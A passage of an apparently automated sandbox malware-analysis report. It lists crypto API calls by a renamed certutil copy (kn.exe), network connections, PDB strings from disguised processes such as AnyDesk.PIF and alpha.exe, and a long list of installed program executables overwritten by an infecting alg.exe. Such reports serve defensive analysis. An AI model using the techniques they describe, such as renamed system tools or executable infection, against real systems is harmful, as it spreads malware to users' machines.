                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F13A2D18
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF7F13C4DDC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416DE0 NCryptCreatePersistedKey,#360,9_2_00007FF7F1416DE0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1412DAC #357,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF7F1412DAC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1408DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,9_2_00007FF7F1408DD0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,9_2_00007FF7F13E0DD4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1430DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,9_2_00007FF7F1430DB8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E1058 NCryptOpenStorageProvider,#205,#359,#357,9_2_00007FF7F13E1058
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141705C BCryptGetProperty,#360,9_2_00007FF7F141705C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,9_2_00007FF7F138107C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E7020
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E301C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1357034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,9_2_00007FF7F1357034
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF7F135302F
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,9_2_00007FF7F13D9028
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E10D8 NCryptSetProperty,#205,#359,#357,#359,#357,9_2_00007FF7F13E10D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF7F13E30D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13EB0A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,9_2_00007FF7F13AB098
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14170C8 BCryptSetProperty,#360,9_2_00007FF7F14170C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,9_2_00007FF7F140EF74
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,9_2_00007FF7F13D0F58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1374F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,9_2_00007FF7F1374F90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1378F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,9_2_00007FF7F1378F1C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416F2C NCryptExportKey,#360,9_2_00007FF7F1416F2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF7F13C4F50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141700C BCryptEnumAlgorithms,#360,9_2_00007FF7F141700C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416FAC BCryptOpenAlgorithmProvider,#360,9_2_00007FF7F1416FAC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0FB4 NCryptOpenKey,#205,#359,#357,#357,9_2_00007FF7F13E0FB4
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49892 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49996 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:50000 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdb source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002215E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1682798891.0000000002912000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.000000000291C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
